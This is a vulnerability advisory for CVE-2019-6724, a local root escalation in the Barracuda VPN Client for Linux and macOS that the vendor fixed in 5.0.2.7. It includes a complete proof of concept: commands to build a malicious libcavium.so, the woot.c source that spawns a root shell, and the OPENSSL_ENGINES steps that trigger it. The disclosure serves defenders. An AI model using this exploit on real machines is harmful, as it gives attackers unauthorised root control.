Allele Security Alert
ASA-2019-00157
Identifier(s)
ASA-2019-00157, CVE-2019-6724
Title
Privilege Escalation in VPN Client
Vendor(s)
Barracuda
Product(s)
Barracuda VPN Client for macOS
Barracuda VPN Client for Linux
Affected version(s)
Barracuda VPN Client prior to version 5.0.2.7 for Linux
Barracuda VPN Client prior to version 5.0.2.7 for macOS
Fixed version(s)
Barracuda VPN Client version 5.0.2.7 for Linux
Barracuda VPN Client version 5.0.2.7 for macOS
Proof of concept
Yes
Description
The barracudavpn component of the Barracuda VPN Client prior to version 5.0.2.7 for Linux, macOS, and OpenBSD runs as a privileged process and can allow an unprivileged local attacker to load a malicious library, resulting in arbitrary code executing as root.
Technical details
The barracudavpn binary attempts to load a non-existent library named libcavium.so from /opt/phio/libs64/engines.
[root@localhost ~]# strace -u user1 -o /tmp/vpn.trace -ff -s 1000 /usr/local/bin/barracudavpn [root@localhost ~]# grep \\.so /tmp/vpn.trace open("/opt/phion/libs/engines/libcavium.so", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
The path it tries to load a library can be influenced through OPENSSL_ENGINES environment variable.
[root@localhost ~]# export OPENSSL_ENGINES=/foobar [root@localhost ~]# timeout 10s strace -u user1 -ff /usr/local/bin/barracudavpn 2>&1|grep '\.so' open("/foobar/libcavium.so", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
Then, achieving privilege escalation is straightforward.
[user1@localhost ~]$ mkdir foobar [user1@localhost ~]$ gcc -fPIC -Wall -o woot.o -c woot.c [user1@localhost ~]$ gcc -Wall -shared -Wl,-soname,libcavium.so -Wl,-init,woot -o foobar/libcavium.so woot.o [user1@localhost ~]$ export OPENSSL_ENGINES=foobar
The content of woot.c:
#include <stdlib.h> #include <sys/types.h> #include <unistd.h> void woot(){ setreuid(0,0); execl("/bin/sh","/bin/sh",NULL); }
After building a malicious library and changing the environment variable, just running /usr/local/bin/barracudavpn will get privilege escalation.
[user1@localhost ~]$ id uid=1000(user1) gid=1000(user1) groups=1000(user1) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 [user1@localhost ~]$ /usr/local/bin/barracudavpn sh-4.2# id uid=0(root) gid=1000(user1) groups=1000(user1) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 sh-4.2#
Credits
Rich Mirch
Reference(s)
CVE-2019-6724 : Barracuda VPN Client Privilege Escalation on Linux and macOS
https://blog.mirch.io/2019/02/14/cve-2019-6724-barracuda-vpn-client-privilege-escalation-on-linux-and-macos/
Release Notes – Barracuda VPN Client for macOS
https://campus.barracuda.com/product/networkaccessclient/doc/78154147/release-notes-barracuda-vpn-client-for-macos/
Release Notes – Barracuda VPN Client for Linux
https://campus.barracuda.com/product/networkaccessclient/doc/78154149/release-notes-barracuda-vpn-client-for-linux/
CVE-2019-6724.sh
https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2019-6724.sh
CVE-2019-6724
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6724
CVE-2019-6724
https://nvd.nist.gov/vuln/detail/CVE-2019-6724
If there is any error in this alert or you wish a comprehensive analysis, let us know.
Last modified: March 27, 2019